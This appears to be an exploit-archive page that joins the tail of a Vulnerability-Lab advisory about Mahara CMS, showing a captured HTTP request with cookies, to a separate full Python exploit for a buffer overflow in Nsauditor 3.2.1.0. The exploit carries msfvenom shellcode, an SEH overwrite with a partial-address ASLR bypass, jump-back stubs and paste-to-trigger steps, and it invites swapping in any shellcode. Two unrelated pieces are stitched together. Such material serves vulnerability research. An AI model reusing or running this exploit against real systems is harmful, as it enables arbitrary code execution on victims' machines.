Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2
Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
# Date: 2020-04-17
# Exploit Author: Cervoise
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.1.0 and 3.0.28
# Tested on: Windows 10.0.18363.778 x86 Pro EN
# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES
(https://www.exploit-db.com/exploits/46005)
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still
vulnerable
# 1 -> Change the shellcode with the one you want
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
# 3 -> Open Nsauditor
# 4 -> In the Window select "Tools" -> "Dns Lookup"
# 5 -> Paste the content into the Field: "Dns Query'"
# 6 -> Click "Resolve"
#!/usr/bin/python3
# Badchars ->
\x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
# Maybe less badchars between \x80 and \x9f but I was lazy (I just
checked thoose I needed)
# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v
shellcode
shellcode = b""
shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"
shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"
# 0x006ea017 : pop esi # pop ecx # ret | startnull
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v3.0.28.0 (C:\Program
Files\Nsauditor\Nsauditor.exe)
# 0x006ea017 : pop esi # pop ecx # ret | startnull
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v3.2.1.0 (C:\Program
Files\Nsauditor\Nsauditor.exe)
pop_pop_ret = b"\x17\xa0\x6e"
jmp_back = b"\xeb\xc3\x90\x90" #JMP 0xffffffc5
# An address near the end of our buffer is on the stack, only three pop
are needed to get it
# Then we just have to moving at the begging of our buffer
# An egghunter does the job, but will not be compatible with all Windows
versions
going_back = b"\x58" #POP EAX
going_back += b"\x58" #POP EAX
going_back += b"\x58" #POP EAX
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\x83\xE8\x79" #SUB EAX,0x79
going_back += b"\xFF\xE0" #JMP EAX
buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)
buffer += shellcode + b"\x90"*100
buffer += going_back
buffer += jmp_back + pop_pop_ret #nSEH / SEH
# Write the exploit
file = open("nsauditor-3-2-1-exploit.txt", "wb")
file.write(buffer)
file.close()